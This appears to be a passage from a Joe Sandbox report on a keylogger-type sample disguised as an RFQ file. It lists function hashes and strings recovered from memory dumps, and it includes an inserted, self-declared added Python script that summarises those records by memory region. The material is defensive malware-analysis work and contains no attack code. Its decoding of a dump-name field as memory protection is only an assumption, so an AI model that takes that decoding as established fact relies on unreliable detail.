• Instruction Fuzzy Hash: 3861E174E0560DDBCB08CFA9C5849EEFBF2FF89311F24952AD415BB214D7309A128B65
Strings
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: #HBF$w*S
• API String ID: 0-2996935253
• Opcode ID: 62bc495d2c94ecba8fded10387409d10992ace4777be46416e5d7a547cb2ce59
• Instruction ID: 45693d3a5327b0e1fc05a9b890cfb3b8e9fcf3f57ecb102485ee5f9504371ae5
• Opcode Fuzzy Hash: 62bc495d2c94ecba8fded10387409d10992ace4777be46416e5d7a547cb2ce59
• Instruction Fuzzy Hash: 1D61D274E0560DCFCB08CFA9C9809EEFBF2EF89311F28952AD415B7214D7349A528B65
Strings
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: @$@
• API String ID: 0-693420146
                                                                                                                                                                                                • Opcode ID: 127aade9cd02be02476a095199c739f7e591deb15659250f54d62d14221c6544
                                                                                                                                                                                                • Instruction ID: e0db220b44b06489fe852dcfad46900ca904b32cf45ce62853694adf651669b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 127aade9cd02be02476a095199c739f7e591deb15659250f54d62d14221c6544
                                                                                                                                                                                                • Instruction Fuzzy Hash: AD61F4B4D0260DDBDB04CFEAD9816EEBBF2BF88301F14941AD465A7244D7349A81CF98
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: A{]z$}\%G
                                                                                                                                                                                                • API String ID: 0-4271377017
                                                                                                                                                                                                • Opcode ID: 9e9e462d49bd49089459042292b448d961af910a629ba35c440818894c19ebe0
                                                                                                                                                                                                • Instruction ID: 7933cab19502d9c3184a67f0f1af587eb9c6ddfce6c1ae6f139c5764cb293415
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e9e462d49bd49089459042292b448d961af910a629ba35c440818894c19ebe0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0341F6B0D1460EDFCB04CFAAC5815EEFBF2AB88315F24D42AC515B7254E7349A428F94
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: A{]z$}\%G
                                                                                                                                                                                                • API String ID: 0-4271377017
                                                                                                                                                                                                • Opcode ID: 0bdc88dc1bf3e793cff294a140c42685c6eaabda707bbe5dc52f39d5c5d755b1
                                                                                                                                                                                                • Instruction ID: 6f164d6474311f15653d6400be4284139d2c7dd5bd75abcbc0a0a7acd69aa004
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bdc88dc1bf3e793cff294a140c42685c6eaabda707bbe5dc52f39d5c5d755b1
                                                                                                                                                                                                • Instruction Fuzzy Hash: AE41E6B0D1460EDFCB44CFAAC5805EEFBB2AB88315F24D42AC515B7214E7349A418F94
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Xbq
                                                                                                                                                                                                • API String ID: 0-63242295
                                                                                                                                                                                                • Opcode ID: 2489de6e91055a844a7884f198bbdc6376804103367faca43646e6ebd6e7d32d
                                                                                                                                                                                                • Instruction ID: 6a2f790a5ce53053cf750009bc885565c1497619e93a955e0c3a6f58ef83e84a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2489de6e91055a844a7884f198bbdc6376804103367faca43646e6ebd6e7d32d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 50B19770F4526BCBDB781F25499923E77A2AFC0A46F644C29D942DA198DE34C8C1CB93
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: yS^Z
                                                                                                                                                                                                • API String ID: 0-4128205011
                                                                                                                                                                                                • Opcode ID: 0354cee270965e82a9e62d859eea3e72ecb5c53789a426a1424f7dc68879392f
                                                                                                                                                                                                • Instruction ID: a11c712c1ad074a7d5585a25c93b537e8ca832e2f3fadc697194ea6e4452d50b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0354cee270965e82a9e62d859eea3e72ecb5c53789a426a1424f7dc68879392f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3671CBB4E0460EDFCB44CFE9D5808AEBBB2FF89311F14952AD415AB314D331A9828F95
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: yS^Z
                                                                                                                                                                                                • API String ID: 0-4128205011
                                                                                                                                                                                                • Opcode ID: 93a7a25cfb762656eef991598042bc92138a6dac8a888d56e1fdf0a214a051aa
                                                                                                                                                                                                • Instruction ID: 95e1180b0dde058dfcc6de906f5b11d2d77bf07e5207352d1c9af8e99d866fa4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 93a7a25cfb762656eef991598042bc92138a6dac8a888d56e1fdf0a214a051aa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F61DFB4E0460EDFCB44CFE9D5808AEFBB2BF89311F14956AD415AB314D334A9828F94
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: ca4f371c56e62a5e285ef13fd9489222f74a8fd26abcdd52607e8c80e8a48485
                                                                                                                                                                                                • Instruction ID: 8d3ed3132224896cac7f4cfd1ab09b790f922862b5100582c49880a41b136a15
                                                                                                                                                                                                • Opcode Fuzzy Hash: ca4f371c56e62a5e285ef13fd9489222f74a8fd26abcdd52607e8c80e8a48485
                                                                                                                                                                                                • Instruction Fuzzy Hash: 43A19070B102545FDB98ABBC841437F6AEBAFC8711F24856D954AEB394CE389C038796
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: de306fc55c0a2b9b4affa82c03cd6aa0548d826d3479a0e96ab58b94a084ad13
                                                                                                                                                                                                • Instruction ID: 6cb8e11a2a8592b02cc5c32c5f91750a9122a6955e2cb09cb46a39068fefab25
                                                                                                                                                                                                • Opcode Fuzzy Hash: de306fc55c0a2b9b4affa82c03cd6aa0548d826d3479a0e96ab58b94a084ad13
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FE1093591076ADACB11EF64D850A9DF7B1FFA5300F10DB9AE4093B211EB706AD5CB81
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: fc3ed00582e5baa54cd692e627599ee95d40129ccd2d5e5e4e74fcdf2b76952c
                                                                                                                                                                                                • Instruction ID: b703008c039a94fc938bb1ab098cb616c41c1de9397febe321b4dc5620266763
                                                                                                                                                                                                • Opcode Fuzzy Hash: fc3ed00582e5baa54cd692e627599ee95d40129ccd2d5e5e4e74fcdf2b76952c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6ED1E43591076ADACB11EF64D850A9DF7B1FFA5300F10DB9AE5093B210EB70AAC5CB81
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 515a1f5df8fe00adf685f62e390a1137ef6a9f598eb3819a69e5f2178bac263d
• Instruction ID: 585cc9150fc1cf5c6d59bfd5d4ebae89d2a14b0a471f2acd0eb6b8b84c1b77a4
• Opcode Fuzzy Hash: 515a1f5df8fe00adf685f62e390a1137ef6a9f598eb3819a69e5f2178bac263d
• Instruction Fuzzy Hash: A3A10A74E011299FCB14CFA9D980AAEBBB2FF89301F24C169D418A7395D734A981CF65

Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 71a6db417c9d6762097e5b02eb8dfefef0ddbd6c14c2bb61fdacfa0d51c5db68
• Instruction ID: b0726d0c93456c591d6d531cf43a185962793ca286d9ba45cdc997c02d23c527
• Opcode Fuzzy Hash: 71a6db417c9d6762097e5b02eb8dfefef0ddbd6c14c2bb61fdacfa0d51c5db68
• Instruction Fuzzy Hash: 7371FD75D056998BDB1ACF7B885469ABFF3AFC6310F18C1E9C489AB225DB300545CF41

Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 92614cff957cd1bb36bcea9ad27fab6cea49fb86d01671d36997e7a9a16d5431
• Instruction ID: c0ee74eb719e844eb2a964a6ed3bb0c0ebad97104915a85eed63447682ec3d05
• Opcode Fuzzy Hash: 92614cff957cd1bb36bcea9ad27fab6cea49fb86d01671d36997e7a9a16d5431
• Instruction Fuzzy Hash: 5C810970E012198FDB54CFA9D980AAEBBB2FF89301F24C169D518A7355D734AA81CF61

Memory Dump Source
• Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 10322db33af086f94e67b25e1b340a3826cfd255daf0b2952bb0d75305dd23a3
• Instruction ID: 1e3c186786b7157e4e38bb77932e44c1dc07c87ab8cc8424c263883dcd457eef
• Opcode Fuzzy Hash: 10322db33af086f94e67b25e1b340a3826cfd255daf0b2952bb0d75305dd23a3
• Instruction Fuzzy Hash: 3371E574E1620AAFCB48CFA9D48499DFBF2FF48311F148566E418AB325D730AA41CF91

Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a8978140c68e43f848775739126ff69cccf7fd673800766de24d280934548b3e
• Instruction ID: 3c5de9b8c98c15f831e6fb7992959327ec46646dfbb9d14fdf995c417352e5ee
• Opcode Fuzzy Hash: a8978140c68e43f848775739126ff69cccf7fd673800766de24d280934548b3e
• Instruction Fuzzy Hash: 54712D70E111198FDB54CFA9C980AAEBBF2FF89301F14C169D518A7355D734A981CF61

Memory Dump Source
• Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 42184ac17c15a9586c51d6b665563d31ebac1fb9fdcbd945197b658e8e8bbc20
• Instruction ID: 464035f30cc41116243235302827348d1ff326b6f2238cbb604ec97d5ab7225b
• Opcode Fuzzy Hash: 42184ac17c15a9586c51d6b665563d31ebac1fb9fdcbd945197b658e8e8bbc20
• Instruction Fuzzy Hash: 8C71C474E1520AAFCB48CF99D58499EFBF2FF48311F148566E419AB324D730AA41CF91

Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1abc8cec81a17b8d1ea04b8def63e29d74df3f64e10a9c9f849a6cc6ab22e76f
• Instruction ID: cac93824602f524c724c0c142e84aed9824aceaaa7c3d9f414207402d15173d4
• Opcode Fuzzy Hash: 1abc8cec81a17b8d1ea04b8def63e29d74df3f64e10a9c9f849a6cc6ab22e76f
• Instruction Fuzzy Hash: FA513970E11519CBDB14CFAAC9805AEFBB3FF88301F24C56AD518A7245D7349A42CF61

Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f5455439d5837280034f96c2c5ce1d23ca2e40834c3f292399f2f8a08f11628
• Instruction ID: 301419b086285c79a7d3de870241f47dd3ff5d594c28c0dd0cc37bbc107738d8
• Opcode Fuzzy Hash: 9f5455439d5837280034f96c2c5ce1d23ca2e40834c3f292399f2f8a08f11628
• Instruction Fuzzy Hash: 46514A71E116188BDB68DF6BCD4479EFAF3AFC8301F14C1BA850DA6254EB305A858F51

Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 911af48f6ed0c1b989cbe91d74515619b288b939a6a75e3775c30507afb9a685
• Instruction ID: 1a75d0751b50480056ae61170111c8785de366027b3a4749d8621503d5fca8b5
• Opcode Fuzzy Hash: 911af48f6ed0c1b989cbe91d74515619b288b939a6a75e3775c30507afb9a685
• Instruction Fuzzy Hash: 5F41F5B4E0520ADFDB44CFA9C5815AEFBF2FF88311F24C56AC419A7214D7349A418BA4

Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a280c82c6f70503124e01f69eb13e4a0324dbf4a095841d4652b40bcd2e2caec
• Instruction ID: 185d56e3d6615464db7871c899afbab7d8460f8c876a00c3af3c076843bd5fe9
• Opcode Fuzzy Hash: a280c82c6f70503124e01f69eb13e4a0324dbf4a095841d4652b40bcd2e2caec
• Instruction Fuzzy Hash: 9C41D4B4E0120ADFCB44CFAAC9805AEFBF2FF88311F24C56AC419A7314D7349A418B94

Memory Dump Source
• Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 530cd8b5137feeacc509f75546958c8e6e393f0d800014aa2912460ed2f95e99
• Instruction ID: 2a7e84c3baca9d739bcaf9115791401cbf32ed784c7ebdd2a8c7dc60881730e9
• Opcode Fuzzy Hash: 530cd8b5137feeacc509f75546958c8e6e393f0d800014aa2912460ed2f95e99
• Instruction Fuzzy Hash: 2D210071E046589BEB18CF6BCC4469EFBF3AFC8200F04C47AD508A6254DB340546CF65

Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e699ba22636cd646d1d2fe799040295b09e1f80536a85a3e0065562ea6e61777
• Instruction ID: 3fd5d00d30c9ede61d6e6bd55261811d28f7c1feb3178b136f60f3747b2fbb44
• Opcode Fuzzy Hash: e699ba22636cd646d1d2fe799040295b09e1f80536a85a3e0065562ea6e61777
• Instruction Fuzzy Hash: 0A110DB1E016189BEB18CF6B8C4069EFAF3AFC9200F04C17AD458A6268EB3405568F11
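Every function record above carries the same shape: a "Source File" line naming the memory dump (with its base offset and a "based on PE: false" flag, i.e. executable memory that is not backed by a mapped PE image, which is where the DarkTortilla-unpacked stage has to live), followed by the Similarity block with Opcode ID, Instruction ID and the two fuzzy hashes. Note also that in every record on this page the Opcode Fuzzy Hash equals the Opcode ID, while the Instruction Fuzzy Hash is the value that varies between near-duplicate functions (compare the 080A0000 and 080B0000 entries). The script below is an added example, not Joe Sandbox code and not part of this report: it parses records of this layout into a per-region summary so an analyst can see how many recovered functions sit in each non-PE-backed region and which of them reference APIs or strings. The sample input is constructed from three records visible in the report. Decoding the dotted dump file name beyond its fourth field (the base address, which the code cross-checks against the report's own Offset value) is an assumption: the fifth field is treated as the Windows page protection, so 0x40 is read as PAGE_EXECUTE_READWRITE, and the remaining fields are kept raw.

```python
"""
Summarise Joe Sandbox per-function memory-dump records by region.
Added example; not Joe Sandbox's own code and not part of the report.
"""
import re
from collections import defaultdict

# Windows memory protection constant (real); reading dump-name field 5 as a
# protection value is an ASSUMPTION about Joe Sandbox's naming scheme.
PAGE_EXECUTE_READWRITE = 0x40

# Constructed input: three records copied from the report, whitespace stripped.
# The last record is deliberately left without its Instruction Fuzzy Hash line.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 92614cff957cd1bb36bcea9ad27fab6cea49fb86d01671d36997e7a9a16d5431
• Instruction ID: c0ee74eb719e844eb2a964a6ed3bb0c0ebad97104915a85eed63447682ec3d05
• Opcode Fuzzy Hash: 92614cff957cd1bb36bcea9ad27fab6cea49fb86d01671d36997e7a9a16d5431
• Instruction Fuzzy Hash: 5C810970E012198FDB54CFA9D980AAEBBB2FF89301F24C169D518A7355D734AA81CF61
Memory Dump Source
• Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 530cd8b5137feeacc509f75546958c8e6e393f0d800014aa2912460ed2f95e99
• Instruction ID: 2a7e84c3baca9d739bcaf9115791401cbf32ed784c7ebdd2a8c7dc60881730e9
• Opcode Fuzzy Hash: 530cd8b5137feeacc509f75546958c8e6e393f0d800014aa2912460ed2f95e99
• Instruction Fuzzy Hash: 2D210071E046589BEB18CF6BCC4469EFBF3AFC8200F04C47AD508A6254DB340546CF65
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: LR^q$LR^q$PH^q$PH^q$$^q$$^q$$^q
• API String ID: 0-3719414822
• Opcode ID: 6e8299083c5373e0f2ccb6352b484e43c2e198cb6db33af55ccdca496c59a2ce
• Instruction ID: 77b74684a7ae55d0ef37f8dcb736ca4ab0aad42cf894f39cea5c7dcbe5009bd7
• Opcode Fuzzy Hash: 6e8299083c5373e0f2ccb6352b484e43c2e198cb6db33af55ccdca496c59a2ce
"""

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.I)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


def parse_records(text):
    """Split the listing into one dict per 'Memory Dump Source' record.
    Empty fields (e.g. '• API ID:') become None; missing lines stay absent."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = SOURCE_RE.search(line)
        if m:
            cur["dump"] = m.group("dump")
            cur["offset"] = int(m.group("offset"), 16)
            cur["pe_backed"] = m.group("pe").lower() == "true"
            continue
        f = FIELD_RE.match(line)
        if f:
            cur[f.group("key").strip()] = f.group("val").strip() or None
    return records


def decode_dump_name(name):
    """Split the dotted .sdmp name. Field 4 is the region base (verified
    against the report's Offset); field 5 is assumed to be the protection."""
    fields = name[:-len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name layout: {name}")
    return {"base": int(fields[3], 16), "protect": int(fields[4], 16), "raw": fields}


def summarise(records):
    """Group records by region base and count what each region contains."""
    by_region = defaultdict(list)
    for r in records:
        by_region[r["offset"]].append(r)
    out = {}
    for offset, recs in sorted(by_region.items()):
        meta = decode_dump_name(recs[0]["dump"])
        if meta["base"] != offset:  # dump name and Offset line must agree
            raise ValueError(f"base mismatch in {recs[0]['dump']}")
        out[offset] = {
            "dump": recs[0]["dump"],
            "pe_backed": recs[0]["pe_backed"],
            "rwx_assumed": meta["protect"] == PAGE_EXECUTE_READWRITE,
            "functions": len(recs),
            "with_api": sum(1 for r in recs if r.get("API ID")),
            "with_strings": sum(1 for r in recs if r.get("String ID")),
            "opcode_ids": sorted(r["Opcode ID"] for r in recs if r.get("Opcode ID")),
        }
    return out


if __name__ == "__main__":
    for base, info in summarise(parse_records(SAMPLE)).items():
        print(f"{base:08X} pe_backed={info['pe_backed']} rwx={info['rwx_assumed']} "
              f"functions={info['functions']} strings={info['with_strings']}")
```

Run it against the text of a full report (paste the function listing into SAMPLE or read it from a file) and the regions with the most functions and no PE backing are the ones worth dumping and scanning with the Snake Keylogger / VIP Keylogger Yara rules; the Opcode ID column, which here always equals the Opcode Fuzzy Hash, is the stable key for correlating the same function across different samples.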
Strings

Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: LR^q$LR^q$PH^q$PH^q$$^q$$^q$$^q
• API String ID: 0-3719414822
• Opcode ID: 6e8299083c5373e0f2ccb6352b484e43c2e198cb6db33af55ccdca496c59a2ce
• Instruction ID: 77b74684a7ae55d0ef37f8dcb736ca4ab0aad42cf894f39cea5c7dcbe5009bd7
• Opcode Fuzzy Hash: 6e8299083c5373e0f2ccb6352b484e43c2e198cb6db33af55ccdca496c59a2ce
                                                                                                                                                                                                • Instruction Fuzzy Hash: F84167B0900218EFCB14DFE9C594A5EBBF2FF45700F25C89AD4262B351DB309A46CB92
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: LR^q$LR^q$LR^q$$^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-1214618821
                                                                                                                                                                                                • Opcode ID: 984fb06d9a7f02cca2294df1b1e39dce1e5bec4b52507a3a4d47d6522f5e43c5
                                                                                                                                                                                                • Instruction ID: 0fde5fbf4b2372d556cbc0b31b27dc0eb805252a73ee01e6ed9deb764bff67d7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 984fb06d9a7f02cca2294df1b1e39dce1e5bec4b52507a3a4d47d6522f5e43c5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EB13A70E04128DFCB18CBA9D584AEDF7F2FB88701F248556E416AB351DB74AC82CB91
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: @$@$B$B$Hbq
                                                                                                                                                                                                • API String ID: 0-1093311442
                                                                                                                                                                                                • Opcode ID: 20607e96d89ab1a4afc34cc1536868dade7e5737bd006ebd4d6b40dbf8e4874a
                                                                                                                                                                                                • Instruction ID: 15cb0883d4d67988c295d6e26fbf3cd91bfb36dd6edc283a7896a97fffccb253
                                                                                                                                                                                                • Opcode Fuzzy Hash: 20607e96d89ab1a4afc34cc1536868dade7e5737bd006ebd4d6b40dbf8e4874a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 72419D71B006158FCB94DF6DC88456EBBFAFF88320B254576D20AEB3A1DB309905CB95
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
